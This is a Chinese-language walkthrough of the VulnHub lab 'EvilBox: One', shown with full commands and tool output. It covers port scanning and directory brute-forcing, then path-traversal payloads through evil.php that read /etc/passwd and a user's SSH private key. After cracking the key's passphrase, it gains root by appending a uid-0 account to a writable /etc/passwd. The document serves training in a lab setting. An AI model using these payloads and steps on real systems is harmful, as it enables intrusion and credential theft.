靶机渗透练习64-EvilBox:One
靶机描述
靶机地址:https://www.vulnhub.com/entry/evilbox-one,736/
Description
Difficulty: Easy
This works better with VirtualBox rather than VMware
一、搭建靶机环境
攻击机Kali:
IP地址:192.168.9.7
靶机:
IP地址:192.168.9.62
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
二、实战
2.1网络扫描
2.1.1 启动靶机和Kali后进行扫描
方法一、arp-scan -I eth0 -l (指定网卡扫)
arp-scan -I eth0 -l
⬢ EvilBox: One arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.7
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2 08:00:27:7b:39:b4 PCS Systemtechnik GmbH
192.168.9.62 08:00:27:0f:4d:14 PCS Systemtechnik GmbH
2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.927 seconds (132.85 hosts/sec). 2 responded
方法二、masscan 扫描的网段 -p 扫描端口号
masscan 192.168.184.0/24 -p 80,22
方法三、netdiscover -i 网卡-r 网段
netdiscover -i eth0 -r 192.168.184.0/24
方法四、等你们补充
2.1.2 查看靶机开放的端口
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ EvilBox: One nmap -A -sV -T4 -p- 192.168.9.62
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-31 16:43 CST
Nmap scan report for bogon (192.168.9.62)
Host is up (0.00034s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:0F:4D:14 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.34 ms bogon (192.168.9.62)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.17 seconds
开放了以下端口
22---ssh---OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80---http---Apache httpd 2.4.38 ((Debian))
2.2枚举漏洞
2.2.1 80 端口分析
直接扫描一下目录:dirsearch -u http://192.168.9.62
⬢ EvilBox: One dirsearch -u http://192.168.9.62
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.9.62/_22-03-31_16-46-22.txt
Error Log: /root/.dirsearch/logs/errors-22-03-31_16-46-22.log
Target: http://192.168.9.62/
[16:46:22] Starting:
[16:46:23] 403 - 277B - /.ht_wsr.txt
[16:46:23] 403 - 277B - /.htaccess.bak1
[16:46:23] 403 - 277B - /.htaccess.orig
[16:46:23] 403 - 277B - /.htaccess.sample
[16:46:23] 403 - 277B - /.htaccess.save
[16:46:23] 403 - 277B - /.htaccess_orig
[16:46:23] 403 - 277B - /.htaccess_sc
[16:46:23] 403 - 277B - /.htaccessOLD2
[16:46:23] 403 - 277B - /.htaccessBAK
[16:46:23] 403 - 277B - /.htaccess_extra
[16:46:23] 403 - 277B - /.htaccessOLD
[16:46:23] 403 - 277B - /.htm
[16:46:23] 403 - 277B - /.html
[16:46:23] 403 - 277B - /.httr-oauth
[16:46:23] 403 - 277B - /.htpasswds
[16:46:23] 403 - 277B - /.htpasswd_test
[16:46:24] 403 - 277B - /.php
[16:46:37] 200 - 10KB - /index.html
[16:46:43] 200 - 12B - /robots.txt
[16:46:44] 301 - 313B - /secret -> http://192.168.9.62/secret/
[16:46:44] 200 - 4B - /secret/
[16:46:44] 403 - 277B - /server-status
[16:46:44] 403 - 277B - /server-status/
Task Completed
访问:http://192.168.9.62/robots.txt
H4x0r可能是个用户名
访问:http://192.168.9.62/secret/ 无任何显示,查看源码也没东西,可能是个目录
扫一下看看
⬢ EvilBox: One dirsearch -u http://192.168.9.62/secret/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.9.62/-secret-_22-03-31_16-52-03.txt
Error Log: /root/.dirsearch/logs/errors-22-03-31_16-52-03.log
Target: http://192.168.9.62/secret/
[16:52:03] Starting:
[16:52:04] 403 - 277B - /secret/.ht_wsr.txt
[16:52:04] 403 - 277B - /secret/.htaccess.sample
[16:52:04] 403 - 277B - /secret/.htaccess_orig
[16:52:04] 403 - 277B - /secret/.htaccess_extra
[16:52:04] 403 - 277B - /secret/.htaccess.save
[16:52:04] 403 - 277B - /secret/.htaccess_sc
[16:52:04] 403 - 277B - /secret/.htaccess.bak1
[16:52:04] 403 - 277B - /secret/.htaccessOLD
[16:52:04] 403 - 277B - /secret/.htaccessOLD2
[16:52:04] 403 - 277B - /secret/.htaccessBAK
[16:52:04] 403 - 277B - /secret/.htm
[16:52:04] 403 - 277B - /secret/.html
[16:52:04] 403 - 277B - /secret/.htpasswd_test
[16:52:04] 403 - 277B - /secret/.htpasswds
[16:52:04] 403 - 277B - /secret/.httr-oauth
[16:52:04] 403 - 277B - /secret/.htaccess.orig
[16:52:04] 403 - 277B - /secret/.php
[16:52:17] 200 - 4B - /secret/index.html
Task Completed
换个工具试试
⬢ EvilBox: One gobuster dir -u http://192.168.9.62/secret/ -x html,zip,bak,txt,php --wordlist=/usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.62/secret/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,zip,bak,txt
[+] Timeout: 10s
===============================================================
2022/03/31 17:13:24 Starting gobuster in directory enumeration mode
===============================================================
/.hta.bak (Status: 403) [Size: 277]
/.hta.txt (Status: 403) [Size: 277]
/.hta.php (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/.hta.html (Status: 403) [Size: 277]
/.hta.zip (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.htaccess.bak (Status: 403) [Size: 277]
/.htpasswd.txt (Status: 403) [Size: 277]
/.htpasswd.php (Status: 403) [Size: 277]
/.htaccess.txt (Status: 403) [Size: 277]
/.htaccess.php (Status: 403) [Size: 277]
/.htpasswd.html (Status: 403) [Size: 277]
/.htpasswd.zip (Status: 403) [Size: 277]
/.htaccess.html (Status: 403) [Size: 277]
/.htaccess.zip (Status: 403) [Size: 277]
/.htpasswd.bak (Status: 403) [Size: 277]
/evil.php (Status: 200) [Size: 0]
/index.html (Status: 200) [Size: 4]
/index.html (Status: 200) [Size: 4]
===============================================================
2022/03/31 17:13:26 Finished
===============================================================
⬢ EvilBox: One
扫出/evil.php
访问:http://192.168.9.62/secret/evil.php
还是空白页面
2.3漏洞利用
2.3.1 文件包含漏洞
SQL注入测试失败,尝试使用文件包含
使用wfuzz工具进行模糊测试
⬢ EvilBox: One wfuzz -u "192.168.9.62/secret/evil.php?FUZZ=../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.9.62/secret/evil.php?FUZZ=../../../../etc/passwd
Total requests: 4711
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001162: 200 26 L 38 W 1398 Ch "command"
Total time: 0
Processed Requests: 4711
Filtered Requests: 4710
Requests/sec.: 0
⬢ EvilBox: One
成功拿到参数command
访问:view-source:http://192.168.9.62/secret/evil.php?command=../../../../etc/passwd
发现 mowree 用户,嘿嘿,咱们这里直接去查看其私钥
view-source:http://192.168.9.62/secret/evil.php?command=../../../../home/mowree/.ssh/id_rsa
其私钥内容为
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
-----END RSA PRIVATE KEY-----
访问view-source:http://192.168.9.62/secret/evil.php?command=../../../../home/mowree/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne
私钥跟authorized_keys都有了
破解一下密码
⬢ EvilBox: One /usr/share/john/ssh2john.py id_rsa > hash.txt
⬢ EvilBox: One john --wordlist=/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2022-03-31 17:57) 100.0g/s 115200p/s 115200c/s 115200C/s scully..trigger
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
⬢ EvilBox: One
成功拿到ssh登录密码unicorn
尝试登录
⬢ EvilBox: One ssh mowree@192.168.9.62 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
mowree@EvilBoxOne:~$
成功登录,并在用户目录下拿到flag1
2.4权限提升
2.4.1 信息收集
信息收集一波
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ sudo -l
-bash: sudo: orden no encontrada
没发现什么可利用的
mowree@EvilBoxOne:~$ cd /tmp
mowree@EvilBoxOne:/tmp$ wget http://192.168.9.7:88/linpeas.sh
--2022-03-31 12:08:06-- http://192.168.9.7:88/linpeas.sh
Conectando con 192.168.9.7:88... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 762836 (745K) [text/x-sh]
Grabando a: “linpeas.sh”
linpeas.sh 100%[==================================>] 744,96K --.-KB/s en 0,004s
2022-03-31 12:08:06 (193 MB/s) - “linpeas.sh” guardado [762836/762836]
mowree@EvilBoxOne:/tmp$ ./linpeas.sh > output.txt
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . sed: -e expresión #1, carácter 348: opción desconocida para `s'
sed: -e expresión #1, carácter 27: opción desconocida para `s'
find: ‘./systemd-private-71cf1e41c2f841ec978f689adb1c577b-apache2.service-jDIhw0’: Permiso denegado
find: ‘./systemd-private-71cf1e41c2f841ec978f689adb1c577b-systemd-timesyncd.service-ZQc0WJ’: Permiso denegado
./linpeas.sh: 2721: ./linpeas.sh: gpg-connect-agent: not found
mowree@EvilBoxOne:/tmp$ ls
linpeas.sh systemd-private-71cf1e41c2f841ec978f689adb1c577b-apache2.service-jDIhw0
output.txt systemd-private-71cf1e41c2f841ec978f689adb1c577b-systemd-timesyncd.service-ZQc0WJ
mowree@EvilBoxOne:/tmp$
查看一下输出文件,发现 /etc/passwd 文件可以写入
咱们可以追加一个用户密码到/etc/passwd文件末尾,通过切换用户拿到root权限
⬢ EvilBox: One mkpasswd -m sha-512
密码:
$6$p7H73wlaIu771Bee$lzlH8TvKZjJzjnQbxHco2eA6aZ4MnyTnF57zMaVoafyDj70PH73PcFqGdusN2XNJinj.eDTTGBzj4CgGhYCmd/
test:$6$p7H73wlaIu771Bee$lzlH8TvKZjJzjnQbxHco2eA6aZ4MnyTnF57zMaVoafyDj70PH73PcFqGdusN2XNJinj.eDTTGBzj4CgGhYCmd/:0:0:root:/root:/bin/bash
mowree@EvilBoxOne:/tmp$ vi /etc/passwd
mowree@EvilBoxOne:/tmp$ su test
Contraseña:
root@EvilBoxOne:/tmp# cd /root
root@EvilBoxOne:~# ls
root.txt
root@EvilBoxOne:~# cat root.txt
36QtXfdJWvdC0VavlPIApUbDlqTsBM
root@EvilBoxOne:~#
成功拿到root权限,并在root目录下拿到flag2
总结
本靶机通过文件包含漏洞拿到ssh私钥,ssh登录后通过写入/etc/passwd内容提权
- 发现主机
- 信息收集
- 文件包含漏洞
- wfuzz的使用
- ssh2john.py的使用
- john的使用
/etc/passwd写入提权
